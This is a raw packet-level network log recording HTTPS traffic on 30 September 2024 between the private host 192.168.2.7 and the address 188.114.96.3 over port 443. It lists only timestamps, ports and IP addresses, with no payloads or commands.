Sep 30, 2024 18:19:10.326884985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.326927900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.326936007 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.326977015 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.328205109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.328221083 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.328274012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.328280926 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.328319073 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.363220930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.363240004 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.363329887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.363348961 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.363398075 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.413747072 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.413770914 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.413865089 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.413882017 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.413930893 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.414426088 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.414443016 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.414489985 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.414499044 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.414544106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.414875984 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.414890051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.414948940 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.414957047 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.415000916 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.415616035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.415632963 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.415689945 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.415698051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.415740967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.416914940 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.416932106 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.416980028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.416990995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.417032957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.417463064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.417479038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.417520046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.417536020 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.417553902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.417571068 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.419245005 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.419264078 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.419323921 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.419332981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.419373035 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.453922987 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.453947067 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.454037905 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.454050064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.454092026 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504293919 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504316092 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504360914 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504374981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504401922 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504412889 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504774094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504790068 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504832983 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504839897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.504868984 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.504888058 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.505340099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.505356073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.505414009 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.505425930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.505460978 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.506207943 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506222010 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506283998 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.506294012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506335974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.506763935 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506779909 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506822109 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.506829023 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.506854057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.506871939 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.507647991 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.507668018 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.507700920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.507708073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.507734060 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.507755995 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.508064985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.508080006 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.508128881 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.508137941 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.508177042 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.544529915 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.544552088 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.544615030 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.544629097 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.544652939 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.544672966 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595195055 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595216990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595388889 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595406055 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595525980 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595541954 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595557928 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595694065 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595702887 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595765114 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595884085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595899105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595937967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.595947027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.595984936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.596930981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.596946955 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597043991 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.597052097 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597140074 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.597424030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597439051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597517014 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.597524881 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597564936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.597882032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597897053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597944021 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.597951889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.597992897 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.598620892 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.598637104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.598694086 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.598700047 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.598738909 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.635129929 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.635139942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.635325909 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.635339975 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.635462999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.685364962 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685384989 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685496092 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.685527086 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685573101 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.685806990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685822964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685866117 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.685873985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.685895920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.685915947 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.686440945 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.686463118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.686497927 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.686506033 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.686532974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.686552048 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.687294006 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.687310934 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.687367916 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.687376976 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.687416077 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.688379049 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688394070 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688446999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.688455105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688491106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.688776970 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688793898 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688855886 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.688863993 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.688901901 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.689287901 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.689302921 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.689373970 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.689379930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.689438105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.725728989 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.725750923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.725887060 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.725898981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.725953102 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.776405096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776436090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776525021 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.776536942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776549101 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.776585102 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.776611090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776629925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776668072 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.776673079 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.776695967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.779401064 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.787919998 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.787955999 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788029909 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788037062 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788052082 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788094997 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788209915 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788230896 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788273096 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788280010 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788322926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788322926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788708925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788731098 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788777113 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788783073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.788806915 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.788821936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789448977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789465904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789511919 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789518118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789535046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789545059 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789558887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789566040 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789594889 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789602995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789618015 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789623022 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.789650917 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.789680004 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.819684029 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.819715023 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.819809914 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.819822073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.819861889 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.867225885 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.867259026 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.867331028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.867347002 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.867388010 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.867398024 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869163036 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869187117 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869224072 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869230032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869256973 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869277000 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869618893 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869637966 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869673967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869678974 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.869704008 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.869720936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.870119095 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870137930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870187998 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.870194912 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870234966 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.870541096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870558977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870590925 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.870596886 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.870620966 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.870642900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871026039 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871051073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871081114 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871087074 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871114969 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871129036 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871459961 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871481895 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871514082 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871520042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.871543884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.871562958 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.911840916 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.911878109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.912004948 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.912019014 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.912038088 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.912054062 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.958458900 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.958492994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.958602905 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.958611965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.958651066 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.960412979 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.960445881 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.960489988 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.960495949 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.960520029 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.960536003 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961029053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961050034 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961092949 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961100101 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961126089 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961138964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961550951 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961575031 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961612940 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961620092 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.961642981 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.961658955 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962089062 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962115049 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962151051 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962157011 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962183952 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962198019 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962671041 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962697029 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962733984 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962742090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.962768078 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.962784052 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.963495016 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.963522911 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.963567972 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.963574886 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.963597059 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.963615894 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.002933025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.002966881 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.003087044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.003102064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.003144979 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.049365044 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.049400091 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.049494028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.049508095 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.049592018 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.052669048 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.052726984 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.052738905 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.052747965 CEST	443	49701	188.114.96.3	192.168.2.7
